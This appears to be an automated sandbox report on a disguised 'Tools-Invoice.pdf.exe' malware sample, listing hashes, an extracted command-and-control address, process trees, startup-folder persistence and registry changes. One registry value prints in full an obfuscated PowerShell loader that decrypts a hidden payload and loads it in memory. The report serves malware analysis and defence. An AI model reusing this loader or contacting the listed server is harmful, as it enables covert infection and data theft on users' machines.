Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
16-04-2024 21:29
Static task
static1
Behavioral task
behavioral1
Sample
Tools-Invoice.pdf.7z
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Tools-Invoice.pdf.7z
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
Tools-Invoice.pdf.exe
Resource
win7-20240221-en
General
-
Target
Tools-Invoice.pdf.7z
-
Size
2.0MB
-
MD5
0cdc67b3f8a598bec1e06964536d5998
-
SHA1
99c6c928f0a7843e422a89d578175ad011ea4f10
-
SHA256
dbba073f0c88fe42a7614b65cb8db2f5ad346fdfb1e21763288d2d73e65c9b6f
-
SHA512
4414cd2085a1d207d4d02d0cafd33cca7fcd0faa57c2264891b088ff8fd0b872cb45bf932fe49b72ca0e6611eb165e20f9a432d6d5c8daf73ecb042b77cb2326
-
SSDEEP
49152:ZXWm5vNti62RUJhdigVRTX1uIpEI+1ZoEatFg0uU/:z26cUJhNnEImoJFg05/
Malware Config
Extracted
jupyter
http://146.70.71.174
Signatures
-
Drops startup file 1 IoCs
Processes:
Tools-Invoice.pdf.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hAVgTuSwZVehWINM.JGQUztJSvGJQzQzHsqmngfAejSe Tools-Invoice.pdf.exe -
Executes dropped EXE 3 IoCs
Processes:
Tools-Invoice.pdf.exeTvtuziedoTs.exeTools-Invoice.pdf.exepid process 2756 Tools-Invoice.pdf.exe 2460 TvtuziedoTs.exe 2524 Tools-Invoice.pdf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 7 IoCs
Processes:
Tools-Invoice.pdf.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\fvjfenuvcvqm\shell\open\command Tools-Invoice.pdf.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\fvjfenuvcvqm Tools-Invoice.pdf.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\fvjfenuvcvqm\shell Tools-Invoice.pdf.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\fvjfenuvcvqm\shell\open Tools-Invoice.pdf.exe Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\fvjfenuvcvqm\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('4tlPZeU/u3NIcXTiv65iMu84tVLO8U2c+xIHrjnZmxo=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxoQVZnVHVTd1pWZWhXSU5NLkpHUVV6dEpTdkdKUXpRekhzcW1uZ2ZBZWpTZQ=='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[rt8wjQPEtmlcqs2iZrKuC47aQbTVEoFCYALe76hrb9pjqI8TnDQI_jjI0fyLqYCg.F5YiBpBH3_z]::QcCj8u48mNjtGnV7OG0X1ZnL892XAoU7zbmgVpCcAaUUbOZCUGvAYET2YXVRYaeFftCcN();\"" Tools-Invoice.pdf.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.jgquztjsvgjqzqzhsqmngfaejse Tools-Invoice.pdf.exe Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.jgquztjsvgjqzqzhsqmngfaejse\ = "fvjfenuvcvqm" Tools-Invoice.pdf.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
7zFM.exepid process 2604 7zFM.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
7zFM.exepid process 2604 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
7zFM.exeTools-Invoice.pdf.exedescription pid process Token: SeRestorePrivilege 2604 7zFM.exe Token: 35 2604 7zFM.exe Token: SeSecurityPrivilege 2604 7zFM.exe Token: SeDebugPrivilege 2524 Tools-Invoice.pdf.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
7zFM.exeTvtuziedoTs.exepid process 2604 7zFM.exe 2604 7zFM.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe 2460 TvtuziedoTs.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
cmd.exe7zFM.exeTools-Invoice.pdf.exedescription pid process target process PID 2224 wrote to memory of 2604 2224 cmd.exe 7zFM.exe PID 2224 wrote to memory of 2604 2224 cmd.exe 7zFM.exe PID 2224 wrote to memory of 2604 2224 cmd.exe 7zFM.exe PID 2604 wrote to memory of 2756 2604 7zFM.exe Tools-Invoice.pdf.exe PID 2604 wrote to memory of 2756 2604 7zFM.exe Tools-Invoice.pdf.exe PID 2604 wrote to memory of 2756 2604 7zFM.exe Tools-Invoice.pdf.exe PID 2756 wrote to memory of 2460 2756 Tools-Invoice.pdf.exe TvtuziedoTs.exe PID 2756 wrote to memory of 2460 2756 Tools-Invoice.pdf.exe TvtuziedoTs.exe PID 2756 wrote to memory of 2460 2756 Tools-Invoice.pdf.exe TvtuziedoTs.exe PID 2756 wrote to memory of 2460 2756 Tools-Invoice.pdf.exe TvtuziedoTs.exe PID 2756 wrote to memory of 2524 2756 Tools-Invoice.pdf.exe Tools-Invoice.pdf.exe PID 2756 wrote to memory of 2524 2756 Tools-Invoice.pdf.exe Tools-Invoice.pdf.exe PID 2756 wrote to memory of 2524 2756 Tools-Invoice.pdf.exe Tools-Invoice.pdf.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Tools-Invoice.pdf.7z1⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Tools-Invoice.pdf.7z"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\7zOC2A6BC16\Tools-Invoice.pdf.exe"C:\Users\Admin\AppData\Local\Temp\7zOC2A6BC16\Tools-Invoice.pdf.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\7zOC2A6BC16\TvtuziedoTs.exe"C:\Users\Admin\AppData\Local\Temp\7zOC2A6BC16\TvtuziedoTs.exe"4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:2460
-
-
C:\Users\Admin\AppData\Local\Temp\7zOC2A6BC16\Tools-Invoice.pdf.exe"C:\Users\Admin\AppData\Local\Temp\7zOC2A6BC16\Tools-Invoice.pdf.exe" /s4⤵
- Drops startup file
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2524
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
272.0MB
MD519ec298f977fdc71f195a4782fa8b156
SHA14a6035ce7510a7cc02bb785244e2cfcaec89131d
SHA25632b42c8c10ce7ec03005931d079fe7bb7f0e5b36bcf57a789081c6f7787e630c
SHA512d8cd8e043c24998d41b06ed0de8a8628389dab04be583094e68f5660ccc666dc260367297d373c800869fe36878aa8730fe35c2eb0b1e6631c0c2fec338b2391
-
Filesize
997KB
MD5dbc534854dd385e59a3f1906ddfb9020
SHA12b3062d82232ce10a8713829199769ff0d12e0fc
SHA25606486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0
SHA5121506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951